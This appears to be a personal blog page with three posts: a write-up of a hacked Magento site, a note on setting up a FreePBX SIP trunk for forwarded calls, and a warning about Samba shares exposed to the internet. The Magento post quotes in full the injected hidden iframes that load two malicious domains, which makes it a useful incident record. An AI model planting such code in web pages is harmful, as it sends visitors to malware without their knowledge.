Magento site was compromised

It was my first time to see a hacker is close to me.

I was flooded with notification emails from Google Adsense subjected “Your AdSense Publisher Policy Violation Report” from yesterday afternoon. I immediately tried to visit either blog.goods-pro.com or goods-pro.com to see what was going on. I got a scary warning message saying either site contains malware by Chrome and Firefox (on desktop. Chrome for Android does not do safe browsing check. I don’t know if Firefox does so.)

It took me a while to find out which site contains malware. As blog.goods-pro.com was using AdSense but goods-pro.com wasn’t, at first I thought it was blog.goods-pro.com that were hacked. blog.goods-pro.com was powered by WordPress, so I went through all the plugins and compared with my other WordPress sites, I didn’t find a suspicious plugin.

Then I started to look into the main domain site goods-pro.com, which was installed with Magento. It took me quite a while for me to know there was a good tool from https://sitecheck.sucuri.net/ to check what malware was on the site.

Then it took me another while to find out how the hacker did it. Basically the hacker compromised one of admin’s (not mine) password, and add the following code in three places (design/footer/copyright, design/head/includes, design/footer/absolute_footer) in Magento System >> Configuration.

<iframe src=”https://hersosx2sk.tk/Rnjqs3″ frameborder=”0″ width=”0″ height=”0″></iframe><iframe src=”https://mytokeasn2s.ru/mwRwD7″ frameborder=”0″ width=”0″ height=”0″></iframe>

hersosx2sk.tk and mytokeasn2s.ru are malware sites. And if a site links to them, it is regarded as malware site as well. 

When I disabled access of compromised admin accounts (without removing the injected code), I found Chrome and Firefox stopped giving that scary warnings, and visits to hersosx2sk.tk or mytokeasn2s.ru are redirected to Google. I don’t understand how Google can take control of these domains so quick, but anyway, it is not my business.

At last I removed all malware codes and requested AdSense a review of blog.goods-pro.com.

Allow specific “anonymous” inbound SIP calls

之前所有的 SIP 服务商都是提供 SIP 注册的帐号和密码。最近碰上一个新的 SIP 服务商,购买了一个电话号码,它只让我设置 Forward to SIP Server 或 Forward to SIP URI(当然也可以转发到普通电话号码,但那是要额外收费的,不在我考虑范围之内)。

于是,碰到了新命题:我必须在 FreePBX 的 SIP Settings 里同时启用 Allow SIP Guests 和 Allow Anonymous Inbound SIP Calls 才能收到转发过来的 SIP calls。这两项都是我不愿意启用的设置,因为存在被 SIP hackers spamming 的风险。尽管单独启用 Allow SIP Guests 据说没有太大风险,但还是接不到电话,呼叫方会收到 FreePBX 给出的语音提示:The number you have dialed is not in service. Please check the number and dial again.

怎样才能让来自 SIP 服务商的 anonymous calls 通过,而把其他的阻挡在外?我甚至想到了启用 Allow SIP Guests 和 Allow Anonymous Inbound SIP Calls ,但用防火墙规则只允许来自特定 host / IP 的流量。这个方法我自我评价是非常 dirty,我希望是 FreePBX 的问题在 FreePBX 内部解决。

我几乎不带希望,搞了个试验,创建了一个 SIP trunk。它跟之前注册型的 SIP trunk 的区别就是省略了 PEER Details 项里的 username, password 和 Register String。然后,同时禁用 Allow SIP Guests 和 Allow Anonymous Inbound SIP Calls,这时 Forward to SIP URI 已经能工作;再添加一条 Inbound Route,Forward to SIP Server 也能工作了。

这个事实推翻了我对 trunk 的原有理解—— trunk 只是一条进或出的通路。现在我知道 trunk 还能“命名”符合特定条件的“匿名”来电,起到过滤的作用。

此外,我猜想,转发型的 SIP 服务比注册型的 SIP 服务更可靠,因为转发型的 SIP 只在有来电时把数据包转发到我的 FreePBX;而注册型的 SIP 则要不时地重注册保持连接,有时连接已经断开,而 FreePBX 不知道,要等到下个周期才重注册,于是会错过来电。不知我猜想对否?请教过路的 VOIP 专家。

 

Samba can share files over internet

Samba 太强大了,我没想到它可以在公网上共享文件和文件夹,如同在局域网内一样。

如果给 samba server 一个公网 ip,就可以在 internet 上凭着 \\ip 就访问共享文件和文件夹。有点可怕,因为我原先认为 samba 会区别对待局域网内和局域网外用户,不经过一些特别的设置,samba server 不会让 internet 用户用 \\ip 访问共享文件和文件夹。事实不是这样,至少目前 samba 3.2.8 版不是。

同理,如果把 WD Mybook World 建为 dmz,它的 public folder 就暴露给所有 internet users 了。

所以得特别当心,如果想给 samba server internet visible,就不得设置 windows 局域网内共享常见的 guest 无密码访问。